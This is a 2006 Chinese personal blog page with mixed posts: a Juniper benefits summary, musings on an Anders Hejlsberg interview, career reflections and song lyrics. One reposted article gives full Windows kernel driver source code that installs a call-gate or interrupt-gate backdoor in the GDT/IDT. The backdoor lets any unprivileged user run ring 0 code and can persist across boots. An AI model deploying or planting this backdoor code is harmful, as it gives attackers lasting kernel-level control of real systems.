| adriano 的个人资料adriano网上的家照片日志列表 |  工具  帮助 |
|
2006/3/29 eeye公司关于IE最新漏洞的非官方补丁下载地址: March 27, 2006
2006/3/25 Benefits of Working at Juniper Networks看完了 无语中.....怎么像是共产主义?Juniper: 高端网络设备生产商 行业中仅次于CISCO. Benefits of Working at Juniper NetworksJuniper Networks offers a comprehensive and competitive benefits package designed to meet the varying needs of our employees. These benefits are an integral part of Juniper Networks total compensation package and provides employees and their family members valuable protection and financial options during employment with Juniper Networks. Juniper Networks competitive benefit package includes:
Savings Plans Savings Plans401(k) Plan 退休保障基金The 401(k) Plan is a retirement plan that allows employees to set aside a portion of income on a pre-tax basis for retirement. Employees are eligible on their first day of employment. Employees may allocate from 1% to 100% of their pre-tax income to the Plan, up to the IRS maximum limit. Juniper Networks matches 100% of all elective deferrals based on eligible pay, up to a maximum of $2,000 annually. Eligible pay is defined as base salary, overtime, bonus and commissions. All contributions, including the match, are immediately 100% vested. Employee Stock Purchase Plan (ESPP) 低于市场价购买公司股票The ESPP allows you to acquire shares of Juniper Networks common stock through payroll deductions from 1% to 10%. There are two offering periods per year - one beginning February 1 and the second beginning August 1. Employees may purchase Juniper Networks stock at 15% less than the fair market value as of the beginning or end of the offering period.
Health Plans 医疗保健计划Health care coverage is available on the first day of regular employment for employees scheduled to work 30 or more hours per week. Employees may also cover their eligible dependents (spouses, domestic partners and dependents). Medical:
Dental: 居然还有牙科
Vision: 居然还有视力
Prescription Drug ProgramPrescription Drug coverage is automatically provided to employees and eligible dependents that enroll in a Juniper Medical Plan.
Flexible Spending AccountsHealth Care FSAEmployees may use this account to be reimbursed for eligible out-of-pocket health expenses not covered by their health care plan. Employees may allocate between $250 and $3,000 each year to this account. Dependent Care FSAEmployees may use this account to be reimbursed for eligible out-of-pocket expenses associated with caring for dependents while the employee or the employee's spouse work, including child care, elder care or care for an adult dependent who is incapable of self care. Employees may allocate between $250 and $5,000 each year to this account.
Income Protection 收入保护??The benefits below provide income protection for employees scheduled to work more than 30 hours per week.
Time OffPaid Time Off (PTO) 带薪休假Juniper Networks provides paid time off (PTO) to both regular full-time and part-time employees. PTO is defined as paid time away from work for vacation, illness, outside activities, or personal business. You begin earning PTO on your first day at Juniper. PTO is based upon years of service and accrues bi-monthly.
HolidaysJuniper Networks provides 12 paid holidays each year. Nine holidays are fixed and three are floaters pre-designated by Juniper Networks prior to the beginning of each calendar year. Leaves of AbsenceLeaves of absence for medical, family care, new parent and military leaves are available in accordance with state and federal law.
Additional BenefitsEmployee Assistance ProgramThe Employee Assistance Program or EAP, administered by Ann Clark Associates (ACI), is available to employees and their eligible dependents and provides confidential, personal assessment and referral services. Employees and their family members are eligible for up to three visits per calendar year, per incident at no charge. Matching Gift ProgramJuniper Networks Matching Gift Program is designed to increase the impact of your personal charitable contributions to eligible organizations. All eligible gifts will be matched on a dollar-for-dollar basis from $25 to $1,000 per calendar year. Credit UnionJuniper Networks offers its employees eligibility to participate in the KeyPoint Credit Union (formerly AEA Credit Union). Other credit union memberships may be available in areas outside of California. MetLife Home & Auto InsuranceMetLife's Home and Auto insurance program is a voluntary program which offers a variety of special group rates and policy discounts to make insurance more affordable. With this program you can take advantage of convenient payroll deductions to simplify paying for your insurance. BeyondWorkBeyondWork and its BeyondBargains superstore is an employer-sponsored program designed to save employees' time and money by providing easy online access to discounts on a wide variety of goods and services. Tuition AssistanceThe Juniper Tuition Assistance Program is designed to aid employees in the pursuit of work-related courses or course work toward a work-related degree. Stanford Center For Professional Development Program (SCPD) 斯坦福的继续教育?This program provides academic graduate education and short courses for engineers and technology professionals. Courses are delivered via distance learning technologies including television broadcast, videotape instruction and Stanford Online as well as on campus. Important Note: This is intended to be a summary of benefits. The Plan Documents will be the ruling document should a discrepancy arise. Juniper Networks reserves the right to amend the benefit program at its discretion. 2006/3/20 任意用户模式下执行 ring 0 代码任意用户模式下执行 ring 0 代码 Author : sinister Email : sinister@whitecell.org HomePage: http://www.whitecell.org / 众所周知在非 Admin 用户模式下,是不允许加载驱动执行 RING 0 代码的。 本文提供了一种方法,通过修改系统 GDT,IDT 来添加自己的 CALLGATE 和 INTGATE 这样便在系统中设置了一个后门。我们就可以利用这个后门 在任意用户模式下执行 ring 0 代码了。为了保证我们添加的 CALLGATE 和 INT GATE 永久性。可以在第一次安装时利用 SERVICE API 或 INF 文件设置成随 系统启动。不过此方法也有个缺陷,就是在第一次安装 CALLGATE 或 INTGATE 时仍然需要 ADMIN 权限。下面分别给出了添加 CALLGATE 与 INTGATE 的具体 代码。 一、通过添加调用门实现 为了可以让任意用户来调用我们的 CALLGATE 需要解决一个小问题。因为 需要知道 CALLGATE 的 SELECTOR 后才可以调用。而在 RING 3 下除了能 得到 GDT 的 BASE ADDRESS 和 LIMIT 外是无法访问 GDT 内容的。我本想 在 RING 0 把 SELECTOR 保存到文件里。在 RING 3 下读取出来再调用。 后经过跟 wowocock 探讨。他提出的思路是在 RING 0 下通过 ZwQuerySystemInformation 得到 NTDLL.DLL 的 MODULE BASE 然后根据 PE HEADER 中的空闲处存放 SELECTOR。这样在 RING 3 的任意用户模式下 就很容易得到了。在这里要特别感谢 wowocock。下面的代码为了演示 方便,用了在我机器上 GDT 中第一个空闲描述符的 SELECTOR 。 驱动程序: /***************************************************************** 文件名 : WssAddCallGate.c 描述 : 添加调用门 作者 : sinister 最后修改日期 : 2002-11-02 *****************************************************************/ #include "ntddk.h" #include "string.h" #ifndef DWORD #define DWORD unsigned int #endif #ifndef WORD #define WORD unsigned short #endif #define LOWORD(l) ((unsigned short)(unsigned int)(l)) #define HIWORD(l) ((unsigned short)((((unsigned int)(l)) >> 16) & 0xFFFF)) typedef unsigned long ULONG; static NTSTATUS MydrvDispatch (IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp); VOID DriverUnload (IN PDRIVER_OBJECT pDriverObject); #pragma pack(push,1) typedef struct tagGDTR{ WORD wLimit; DWORD *dwBase; }GDTR, *PGDTR; typedef struct tagGDT_DESCRIPTOR{ unsigned limit : 16; unsigned baselo : 16; unsigned basemid : 8; unsigned type : 4; unsigned system : 1; unsigned dpl : 2; unsigned present : 1; unsigned limithi : 4; unsigned available : 1; unsigned zero : 1; unsigned size : 1; unsigned granularity : 1; unsigned basehi : 8; }GDT_DESCRIPTOR, *PGDT_DESCRIPTOR; typedef struct tagCALLGATE_DESCRIPTOR{ unsigned short offset_0_15; unsigned short selector; unsigned char param_count : 4; unsigned char some_bits : 4; unsigned char type : 4; unsigned char app_system : 1; unsigned char dpl : 2; unsigned char present : 1; unsigned short offset_16_31; } CALLGATE_DESCRIPTOR, *PCALLGATE_DESCRIPTOR; #pragma pack(pop) void __declspec(naked) Ring0Call() { PHYSICAL_ADDRESS PhyAdd; __asm { pushad pushfd cli } DbgPrint("WSS - My CallGate \n"); // // 这里可以添加你想要执行的 ring 0 代码。 // __asm { popfd popad retf } } VOID AddCallGate( ULONG FuncAddr ) { GDTR gdtr; PGDT_DESCRIPTOR gdt; PCALLGATE_DESCRIPTOR callgate; WORD wGDTIndex = 1; __asm { sgdt gdtr // 得到 GDT 基地址与界限 } gdt = (PGDT_DESCRIPTOR) ( gdtr.dwBase + 8 ); // 跳过空选择子 while ( wGDTIndex < ( gdtr.wLimit / 8 ) ) { if ( gdt->present == 0 ) //从 GDT 中找到空描述符 { callgate = (PCALLGATE_DESCRIPTOR)gdt; callgate->offset_0_15 = LOWORD(FuncAddr); callgate->selector = 8; // 内核段选择子 callgate->param_count = 0; // 参数复制数量 callgate->some_bits = 0; callgate->type = 0xC; // 386调用门 callgate->app_system = 0; // 系统描述符 callgate->dpl = 3; // RING 3 可调用 callgate->present = 1; // 设置存在位 callgate->offset_16_31 = HIWORD(FuncAddr); DbgPrint("Add CallGate\n"); return; } gdt ++; wGDTIndex ++; } } // 驱动入口 NTSTATUS DriverEntry( IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath ) { UNICODE_STRING nameString, linkString; PDEVICE_OBJECT deviceObject; NTSTATUS status; HANDLE hHandle; int i; //卸载驱动 DriverObject->DriverUnload = DriverUnload; //建立设备 RtlInitUnicodeString( &nameString, L"\\Device\\WssAddCallGate" ); status = IoCreateDevice( DriverObject, 0, &nameString, FILE_DEVICE_UNKNOWN, 0, TRUE, &deviceObject ); if (!NT_SUCCESS( status )) return status; RtlInitUnicodeString( &linkString, L"\\DosDevices\\WssAddCallGate" ); status = IoCreateSymbolicLink (&linkString, &nameString); if (!NT_SUCCESS( status )) { IoDeleteDevice (DriverObject->DeviceObject); return status; } AddCallGate((ULONG)Ring0Call); for ( i = 0; i < IRP_MJ_MAXIMUM_FUNCTION; i++) { DriverObject->MajorFunction[i] = MydrvDispatch; } DriverObject->DriverUnload = DriverUnload; return STATUS_SUCCESS; } //处理设备对象操作 static NTSTATUS MydrvDispatch (IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp) { Irp->IoStatus.Status = STATUS_SUCCESS; Irp->IoStatus.Information = 0L; IoCompleteRequest( Irp, 0 ); return Irp->IoStatus.Status; } VOID DriverUnload (IN PDRIVER_OBJECT pDriverObject) { UNICODE_STRING nameString; RtlInitUnicodeString( &nameString, L"\\DosDevices\\WssAddCallGate" ); IoDeleteSymbolicLink(&nameString); IoDeleteDevice(pDriverObject->DeviceObject); return; } 应用程序: #include <windows.h> #include <stdio.h> void main() { WORD farcall[3]; farcall[0] = 0x0; farcall[1] = 0x0; farcall[2] = 0x4b; //在我机器上,添加 CALLGATE 的选择子为 4BH _asm call fword ptr [farcall] } 二、通过添加中断门实现 添加中断门没有什么需要解决的问题。直接在 RING 3 利用 int x 即可切换。想想系统调用 INT 2E 就很容易理解了。 /***************************************************************** 文件名 : WssMyInt.c 描述 : 添加中断门 作者 : sinister 最后修改日期 : 2002-11-02 *****************************************************************/ #include "ntddk.h" #pragma pack(1) typedef struct tagIDTR { short Limit; unsigned int Base; }IDTR, *PIDTR; typedef struct tagIDTENTRY { unsigned short OffsetLow; unsigned short Selector; unsigned char Reserved; unsigned char Type:4; unsigned char Always0:1; unsigned char Dpl:2; unsigned char Present:1; unsigned short OffsetHigh; } IDTENTRY, *PIDTENTRY; #pragma pack() #define MYINT 0x76 extern VOID _cdecl MyIntFunc(); CHAR IDTBuffer[6]; IDTENTRY OldIdt; PIDTR idtr = (PIDTR)IDTBuffer; static NTSTATUS MydrvDispatch (IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp); VOID DriverUnload (IN PDRIVER_OBJECT pDriverObject); // 我们得中断处理函数 VOID _cdecl MyIntFunc() { PHYSICAL_ADDRESS PhyAdd; unsigned int dwCallNum; unsigned int dwVAddr; _asm mov dwCallNum,eax // // 这里可以添加你想要执行的 ring 0 代码 // switch ( dwCallNum ) { case 0x01: DbgPrint("MyIntGate eax = 0x01\n"); break; case 0x02: DbgPrint("MyIntGate eax = 0x02\n"); break; default:break; } _asm iretd; //中断返回 } NTSTATUS AddMyInt() { PIDTENTRY Idt; //得到 IDTR 中得段界限与基地址 _asm sidt IDTBuffer Idt = (PIDTENTRY)idtr->Base; //得到IDT表基地址 //保存原有得 IDT RtlCopyMemory(&OldIdt, &Idt[MYINT], sizeof(OldIdt)); //禁止中断 _asm cli //设置 IDT 表各项添加我们得中断 Idt[MYINT].OffsetLow = (unsigned short)MyIntFunc; //取中断处理函数低16位 Idt[MYINT].Selector = 8; //设置内核段选择子 Idt[MYINT].Reserved = 0; //系统保留 Idt[MYINT].Type = 0xE; //设置0xE表示是中断门 Idt[MYINT].Always0 = 0; //系统保留必须为0 Idt[MYINT].Dpl = 3; //描述符权限,设置为允许 RING 3 进程调用 Idt[MYINT].Present = 1; //存在位设置为1表示有效 Idt[MYINT].OffsetHigh = (unsigned short)((unsigned int)MyIntFunc>>16); //取中断处理函数高16位 //开中断 _asm sti return STATUS_SUCCESS; } //删除中断 void RemoveMyInt() { PIDTENTRY Idt; Idt = (PIDTENTRY)idtr->Base; _asm cli //恢复 IDT RtlCopyMemory(&Idt[MYINT], &OldIdt, sizeof(OldIdt)); _asm sti } // 驱动入口 NTSTATUS DriverEntry( IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath ) { UNICODE_STRING nameString, linkString; //UNICODE_STRING deviceString; PDEVICE_OBJECT deviceObject; NTSTATUS status; WCHAR wBuffer[200]; nameString.Buffer = wBuffer; nameString.MaximumLength = 200; //卸载驱动 DriverObject->DriverUnload = DriverUnload; //建立设备 RtlInitUnicodeString( &nameString, L"\\Device\\WSSINT" ); status = IoCreateDevice( DriverObject, 0, &nameString, FILE_DEVICE_UNKNOWN, 0, TRUE, &deviceObject ); if (!NT_SUCCESS( status )) return status; RtlInitUnicodeString( &linkString, L"\\??\\WSSINT" ); //使WIN32应用程序可见 status = IoCreateSymbolicLink (&linkString, &nameString); if (!NT_SUCCESS( status )) { IoDeleteDevice (DriverObject->DeviceObject); return status; } AddMyInt(); DriverObject->MajorFunction[IRP_MJ_CREATE] = MydrvDispatch; DriverObject->MajorFunction[IRP_MJ_CLOSE] = MydrvDispatch; return STATUS_SUCCESS; } static NTSTATUS MydrvDispatch (IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp) { NTSTATUS status; UNREFERENCED_PARAMETER( DeviceObject ); Irp->IoStatus.Status = STATUS_SUCCESS; Irp->IoStatus.Information = 0L; status = STATUS_SUCCESS; IoCompleteRequest( Irp, 0 ); return status; } VOID DriverUnload (IN PDRIVER_OBJECT pDriverObject) { UNICODE_STRING nameString; UNICODE_STRING deviceString,driveString; NTSTATUS ntStatus; RemoveMyInt(); //删除WIN32可见 IoDeleteSymbolicLink(&nameString); //删除设备 IoDeleteDevice(pDriverObject->DeviceObject); return; } 2006/3/7 邮件发布space测试 呵呵补上上次的Anders Hejlsberg的采访地址链接和介绍: URL: http://channel9.msdn.com/Showpost.aspx?postid=159952 下载地址: http://download.microsoft.com/download/7/d/3/7d3de91e-0a61-4c31-bcc4-628bc81c635a/Behind_The_Code_2_512k.wmv This episode features industry luminary, Anders Hejlsberg. Before coming to Microsoft in 1996 he was well noted for his work as the principal engineer of Turbo Pascal and the chief architect of the Delphi product line. At Microsoft he was architect for the Visual J++ development system and the Windows Foundation Classes (WFC). Promoted to Distinguished Engineer in 2000, Anders is the chief designer of the C# programming language and a key participant in the development of Microsoft’s .NET framework. In this show, Anders is joined by a surprise guest. This episode of “Behind the Code” is hosted by Barbara Fox – former senior security architect of cryptography and digital rights management for Microsoft. 一些简单的数字 今天看了MSDN上对Anders Hejsberg的专访,链接回来我会补上;此人现在是微软C#语言的首席架构师,另外一个身份是Borland公司的创立者之一.........他的观点对我很有启发:simplicity 即简单,如果你不能把你的技术在5分钟之内让一个不同领域的人明白的话,那么这个技术多半不会成功;虽然他自己是微软的雇员,但是他对微软提出的:COM、DNA、OLE、ACTIVEX都提出了严厉的批评:terrible 呵呵
还有这个man在微软挖他的时候,年薪是300万美元...而他那个时候刚刚30出头??记不清楚了;这个man简直是我的偶像:做着自己喜欢的工作:这份工作不仅很有意义(各位如果明白compiler编译器对计算机软件行业的重要性的话),而且这份工作能让自己的亲人和家庭过上幸福的生活.....
自己呢??
第一个:关于时间,100天对我意味着什么? 除去节假日,它是一年的三分之一;如果还能工作30年,九十分之一;如果我还能活50年,那么这100天是1/150............时间,正在不知不觉中飞逝;
第二个:关于金钱:从现在算起,如果我年薪10万RMB,满打满算再工作50年,才会有500万,按照现在的价格计算,如果想买一辆Audi A8需要不吃不喝攒10年.......什么时候金钱对于我来说只是一个数字而已呢:新出的Audi或者Alpha Romeo想都不用想就可以买呢? 现在才发现 自己从来都没有幻想过这种数量级的Money...
当发现自己连对未来的憧憬(也许叫幻想更合适)都没有的时候,心中掠过一丝悲哀:这难道是成长的代价么? 这样不行, 我要好好规划自己的专业方向:DBer还是IT consultant还是 Reviewer还是 Developer还是...???我想机会总会有的!! 天生我材必有用呀
  写的有点意识流,对不起各位看官了.
2006/3/6 一首好歌偶然听到的,就上baidu 搜了下:
perfect day
Lou Reed
Just a perfect day Drink sangria in the park And then later, when it gets dark, we'll go home Just a perfect day Feed animals in the zoo Then later a movie too, and then home Oh it's such a perfect day I'm glad I spent it with you Oh such a perfect day You just keep me hanging on You just keep me hanging on Just a perfect day Problems all left alone Weekenders on our own It's such fun Just a perfect day You make me forget myself I thought I was someone else Someone good Oh it's such a perfect day I'm glad I spent it with you Oh such a perfect day You just keep me hanging on You just keep me hanging on You're going to reap just what you sow You're going to reap just what you sow You're going to reap just what you sow You're going to reap just what you sow |
|
|
